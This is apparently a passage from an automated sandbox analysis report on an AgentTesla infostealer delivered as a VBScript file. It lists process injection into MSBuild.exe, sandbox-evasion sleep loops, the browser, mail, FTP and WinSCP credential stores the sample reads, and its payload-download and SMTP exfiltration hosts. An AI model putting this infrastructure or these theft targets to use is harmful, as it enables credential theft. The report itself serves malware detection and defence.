                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99780Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99452Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99015Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98796Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98577Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: wscript.exe, 00000000.00000003.1263533043.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297074008.000001B4FBF7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264311503.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264429386.000001B4FBF7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1299870924.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263929463.000001B4FBF7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297074008.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1274037561.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1298030719.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297375516.000001B4FBFCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297375516.000001B4FBF7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: MSBuild.exe, 0000000F.00000002.2511307184.00000000061E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 144.91.79.54 80Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1000000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1000000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1002000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 103C000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 103E000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: EE9008Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7836" "2812" "2804" "2144" "0" "0" "1284" "0" "0" "0" "0" "0" Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 15.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2508931005.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2508931005.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2508931005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8124, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 15.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2508931005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8124, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 15.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2508931005.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2508931005.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2508931005.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8124, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information311
                  Scripting                  		Valid Accounts121
                  Windows Management Instrumentation                  		311
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		311
                  Process Injection                  		1
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		24
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  PowerShell                  		Logon Script (Windows)Logon Script (Windows)1
                  DLL Side-Loading                  		Security Account Manager111
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Masquerading                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                  Virtualization/Sandbox Evasion                  		LSA Secrets141
                  Virtualization/Sandbox Evasion                  		SSHKeylogging23
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                  Process Injection                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590535 Sample: 009.vbe Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 30 time.windows.com 2->30 32 bg.microsoft.map.fastly.net 2->32 34 api.ipify.org 2->34 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 7 other signatures 2->52 8 wscript.exe 2->8         started        11 wscript.exe 32 1 2->11         started        15 wscript.exe 2->15         started        signatures3 process4 dnsIp5 62 Wscript starts Powershell (via cmd or directly) 8->62 64 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->64 17 powershell.exe 44 8->17         started        40 144.91.79.54, 49699, 49700, 80 CONTABODE Germany 11->40 28 C:\Users\user\AppData\...\bEvujIIdkyIbOgF.vbs, ASCII 11->28 dropped 66 System process connects to network (likely due to code injection or exploit) 11->66 68 Potential evasive VBS script found (sleep loop) 11->68 70 Windows Shell Script Host drops VBS files 11->70 72 Suspicious execution chain found 11->72 file6 signatures7 process8 signatures9 42 Writes to foreign memory regions 17->42 44 Injects a PE file into a foreign processes 17->44 20 MSBuild.exe 15 2 17->20         started        24 wermgr.exe 19 17->24         started        26 conhost.exe 17->26         started        process10 dnsIp11 36 162.254.34.31, 49972, 587 VIVIDHOSTINGUS United States 20->36 38 api.ipify.org 104.26.12.205, 443, 49970 CLOUDFLARENETUS United States 20->38 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->54 56 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->56 58 Tries to steal Mail credentials (via file / registry access) 20->58 60 2 other signatures 20->60 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  009.vbe2%VirustotalBrowse
                  009.vbe0%ReversingLabs

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://144.91.79.54/2412/sX0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/r0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/ssceg0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/dl2xgIbUbOo3ZqLShxJX.txtU?E0%Avira URL Cloudsafe
                  http://144.91.79.54/412/r0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/v0%Avira URL Cloudsafe
                  http://144.91.79.54:80/2412/dl2xgIbUbOo3ZqLShxJX.txt0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/s0%Avira URL Cloudsafe
                  http://144.91.79.54/Zs0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/r&s0%Avira URL Cloudsafe
                  http://144.91.79.540%Avira URL Cloudsafe
                  http://144.91.79.54:80/2412/v0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/cn0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/file0%Avira URL Cloudsafe
                  http://144.91.79.54/2412/r4C0%Avira URL Cloudsafe
                  http://144.91.79.54:80/2412/sPH0%Avira URL Cloudsafe
                  http://144.91.79.54/rs0%Avira URL Cloudsafe
                  http://144.91.79.54/0%Avira URL Cloudsafe
                  http://144.91.79.54/6s0%Avira URL Cloudsafe
                  http://144.bd0600%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.210.172
                  		truefalse
                    		high
                    s-part-0017.t-0009.t-msedge.net
                    		13.107.246.45
                    		truefalse
                      		high
                      api.ipify.org
                      		104.26.12.205
                      		truefalse
                        		high
                        time.windows.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://144.91.79.54/2412/sXwscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54/2412/vwscript.exe, 00000000.00000003.1297880876.000001B4FDC8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296994156.000001B4FDC8B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1300343179.000001B4FDC90000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://144.91.79.54/2412/swscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://account.dyn.com/MSBuild.exe, 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmpfalse
                              		high
                              http://144.91.79.54/2412/rwscript.exe, 00000000.00000003.1277534356.000001B4FBFA6000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://144.91.79.54/412/rwscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://144.91.79.54/2412/sscegwscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://144.91.79.54/Zswscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1264311503.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://144.91.79.54:80/2412/dl2xgIbUbOo3ZqLShxJX.txtwscript.exe, 00000000.00000003.1297255452.000001B4FBF6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297767915.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1299612461.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297232057.000001B4FBF5E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://144.91.79.54/2412/dl2xgIbUbOo3ZqLShxJX.txtU?Ewscript.exe, 00000000.00000003.1297309774.000001B4FBFF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296199617.000001B4FBFEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296279117.000001B4FBFF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296973299.000001B4FBFEF000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://144.91.79.54/2412/r&swscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://144.91.79.54:80/2412/vwscript.exe, 00000000.00000003.1297255452.000001B4FBF6F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297767915.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1299612461.000001B4FBF70000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297232057.000001B4FBF5E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://api.ipify.org/tMSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://144.91.79.54wscript.exe, 00000000.00000003.1263929463.000001B4FBF56000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://144.91.79.54/6swscript.exe, 00000000.00000003.1264311503.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://api.ipify.orgMSBuild.exe, 0000000F.00000002.2508931005.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000F.00000002.2505099429.0000000001002000.00000040.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  http://144.91.79.54/rswscript.exe, 00000000.00000003.1274037561.000001B4FBFB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1263533043.000001B4FBFBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
